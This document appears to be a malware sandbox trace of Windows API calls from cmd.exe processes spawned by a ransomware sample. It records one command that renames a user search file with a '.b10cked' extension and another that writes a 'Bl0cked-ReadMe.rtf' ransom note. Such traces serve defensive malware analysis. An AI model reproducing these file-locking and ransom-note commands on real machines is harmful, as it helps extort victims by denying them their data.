[0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x1, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x0, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x4, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x4) returned 0x0 [0216.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ea9c, lpData=0x16eaa0, lpcbData=0x16ea98*=0x1000 | out: lpType=0x16ea9c*=0x0, lpData=0x16eaa0*=0x9, lpcbData=0x16ea98*=0x1000) returned 0x2 [0216.564] RegCloseKey (hKey=0x40) returned 0x0 [0216.565] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.565] srand (_Seed=0x5b8863b2) [0216.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" [0216.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"" [0216.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1d18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.565] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.565] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.565] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.565] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.565] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.565] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.566] GetEnvironmentStringsW () returned 0x1d22c8* [0216.566] FreeEnvironmentStringsW (penv=0x1d22c8) returned 1 [0216.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f860 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f860, lpFilePart=0x16f85c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f85c*="Desktop") returned 0x18 [0216.566] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.566] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.566] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.566] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.566] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.567] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f5dc | out: lpFindFileData=0x16f5dc) returned 0x1d0008 [0216.567] FindClose (in: hFindFile=0x1d0008 | out: hFindFile=0x1d0008) returned 1 [0216.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.567] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.567] GetEnvironmentStringsW () returned 0x1d2ae8* [0216.567] FreeEnvironmentStringsW (penv=0x1d2ae8) returned 1 [0216.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.568] GetConsoleOutputCP () returned 0x1b5 [0216.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.568] GetUserDefaultLCID () returned 0x409 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="0") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="0") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9a0, cchData=128 | out: lpLCData="1") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.568] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 [0216.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.569] GetConsoleTitleW (in: lpConsoleTitle=0x1c08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.569] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.569] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.570] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.570] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.570] _wcsicmp (_String1="move", _String2=")") returned 68 [0216.570] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0216.570] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0216.570] _wcsicmp (_String1="IF", _String2="move") returned -4 [0216.570] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0216.570] _wcsicmp (_String1="REM", _String2="move") returned 5 [0216.570] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0216.573] GetConsoleTitleW (in: lpConsoleTitle=0x16f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.573] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0216.573] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0216.573] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CD") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="REN") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="SET") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0216.573] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="MD") returned 11 [0216.573] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0216.573] _wcsicmp (_String1="move", _String2="RD") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0216.573] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0216.573] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0216.573] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0216.573] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="VER") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0216.573] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0216.573] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0216.573] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0216.573] _wcsicmp (_String1="move", _String2="START") returned -6 [0216.574] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0216.574] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0216.574] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0216.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f454, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f44c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f44c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0216.575] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0216.576] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0216.576] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0216.576] _wcsicmp (_String1="EVERYW~1.SEA", _String2=".") returned 55 [0216.576] _wcsicmp (_String1="EVERYW~1.SEA", _String2="..") returned 55 [0216.576] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA" (normalized: "c:\\users\\default\\searches\\everyw~1.sea")) returned 0x20 [0216.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1d1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", nBufferLength=0x104, lpBuffer=0x16eddc, lpFilePart=0x16edc4 | out: lpBuffer="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", lpFilePart=0x16edc4*="EVERYW~1.SEA") returned 0x26 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: "c:\\users\\default\\searches")) returned 0x11 [0216.577] _wcsicmp (_String1="EVERYW~1.SEA", _String2=".") returned 55 [0216.577] _wcsicmp (_String1="EVERYW~1.SEA", _String2="..") returned 55 [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA" (normalized: "c:\\users\\default\\searches\\everyw~1.sea")) returned 0x20 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", nBufferLength=0x104, lpBuffer=0x16f258, lpFilePart=0x16eff0 | out: lpBuffer="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", lpFilePart=0x16eff0*="EVERYW~1.SEA") returned 0x26 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] SetErrorMode (uMode=0x0) returned 0x0 [0216.577] SetErrorMode (uMode=0x1) returned 0x0 [0216.577] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x16f460, lpFilePart=0x16eff0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", lpFilePart=0x16eff0*="Everywhere.search-ms.b10cked") returned 0x36 [0216.577] SetErrorMode (uMode=0x0) returned 0x1 [0216.577] SetLastError (dwErrCode=0x0) [0216.577] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.b10cked")) returned 0xffffffff [0216.577] GetLastError () returned 0x2 [0216.578] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x16e96c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e96c) returned 0x1c0e50 [0216.578] FindNextFileW (in: hFindFile=0x1c0e50, lpFindFileData=0x16e96c | out: lpFindFileData=0x16e96c) returned 0 [0216.578] GetLastError () returned 0x12 [0216.578] FindClose (in: hFindFile=0x1c0e50 | out: hFindFile=0x1c0e50) returned 1 [0216.579] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\EVERYW~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x1d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1d1bd0) returned 0x1c0e50 [0216.579] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x16ec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked", lpFilePart=0x0) returned 0x36 [0216.579] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms", nBufferLength=0x104, lpBuffer=0x16ec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpFilePart=0x0) returned 0x2e [0216.579] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms")) returned 0x20 [0216.579] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.b10cked"), dwFlags=0x3) returned 1 [0216.580] FindClose (in: hFindFile=0x1c0e50 | out: hFindFile=0x1c0e50) returned 1 [0216.580] _vsnwprintf (in: _Buffer=0x4a375040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebb8 | out: _Buffer=" 1") returned 9 [0216.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.580] GetFileType (hFile=0x7) returned 0x2 [0216.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0216.678] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb44 | out: lpMode=0x16eb44) returned 1 [0216.678] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eb78 | out: lpConsoleScreenBufferInfo=0x16eb78) returned 1 [0216.679] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a384640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0216.679] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a384640, nSize=0x2000, Arguments=0x16ebb8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0216.679] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a384640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eb9c, lpReserved=0x0 | out: lpBuffer=0x4a384640*, lpNumberOfCharsWritten=0x16eb9c*=0x1a) returned 1 [0216.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.679] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.679] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.680] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.680] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.680] SetConsoleInputExeNameW () returned 0x1 [0216.680] GetConsoleOutputCP () returned 0x1b5 [0216.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.680] exit (_Code=0) Process: id = "551" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32197 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32198 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32199 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32200 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 32201 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32202 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32203 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32204 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32205 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32206 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32241 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32242 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32243 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32244 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 32245 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 32246 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32247 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32248 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32249 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32250 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32251 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32252 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32253 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" 